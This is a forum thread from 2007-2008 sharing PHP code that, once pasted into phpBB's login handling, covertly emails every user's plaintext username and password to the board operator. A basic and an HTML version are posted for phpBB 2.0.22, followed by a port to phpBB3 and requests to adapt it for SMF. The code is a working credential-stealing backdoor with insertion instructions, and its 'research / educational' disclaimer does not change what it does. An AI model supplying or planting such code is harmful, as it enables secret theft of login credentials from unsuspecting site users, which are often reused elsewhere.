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phpBB Login Emailer - <2.0.22 |
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Posted: Sun Jul 15, 2007 2:25 am |
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blaxenet |
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Use this script to send the username & password of each user who log's in on your board to a designated email address. This does not work for users who are set to auto-login.
Versions:
This script only works for version 2.0.22 and below!
Instructions:
1) Open login.php using a good text editor.
2) Create a new line under line 91 and paste the code in.
3) Change domain.tld with the domain your using it on.
4) Change email@domain.tld with your email address.
Basic version
Code: | $sitename = "domain.tld";
$username = isset($HTTP_POST_VARS['username']) ? phpbb_clean_username($HTTP_POST_VARS['username']) : '';
$password = isset($HTTP_POST_VARS['password']) ? $HTTP_POST_VARS['password'] : '';
$recipient = 'email@domain.tld';
$subject = 'Password Alert - domain.tld';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message); |
Advanced version - Headers & HTML
Code: | $sitename = "domain.tld";
$username = isset($HTTP_POST_VARS['username']) ? phpbb_clean_username($HTTP_POST_VARS['username']) : '';
$password = isset($HTTP_POST_VARS['password']) ? $HTTP_POST_VARS['password'] : '';
$eol="\n";
$headers .= 'From: My Name <email@domain.tld>'.$eol;
$headers .= 'Reply-To: My Name <email@domain.tld>'.$eol;
$headers .= "X-Mailer: PHP v".phpversion().$eol;
$recipient = 'email@domain.tld';
$subject = 'Password Alert - domain.tld';
$message = "<html><body> Sitename: $sitename <br> Username: $username <br> Password: $password </body></html>";
mail($recipient, $subject, $message, $headers); |
Notes:
I made this a more complicated way to suit me!
Feel free to modify this script to suit you.
This script has been made for research / educational purposes only.
Anyone caught using this script for illegal purposes may be prosecuted. |
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_________________ Blaxenet |
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Posted: Sun Jul 15, 2007 2:28 am |
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blaxenet |
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_________________ Blaxenet |
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Posted: Fri Jan 04, 2008 3:53 am |
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aquadeluxe |
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I took that code, but changed it to work with phpBB3. I am testing with the "Olympus" Gold Release.
Instructions:
1.Open file phpbbroot/includes/functions.php in a text editor.
2. Find " $result = $auth->login($username, $password, $autologin, $viewonline, $admin); " (omit quotes)
3. After, add:
Code: | $sitename = "domain.tld";
$recipient = 'email@domain.tld';
$subject = 'Password Alert - domain.tld';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message); |
4. Change domain.tld with the domain your using it on.
5. Change email@domain.tld with your email address. |
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Posted: Thu Feb 07, 2008 6:45 pm |
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ggg |
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Joined: Feb 04, 2008 |
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Is there any way to do this in SMF? I don't know in which file I should add this code. |
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SMF 1.1.4 |
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Posted: Sun Mar 23, 2008 7:56 am |
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starwar |
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Joined: Mar 23, 2008 |
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I also wanna do for SMF 1.1.4
where can i edit? |
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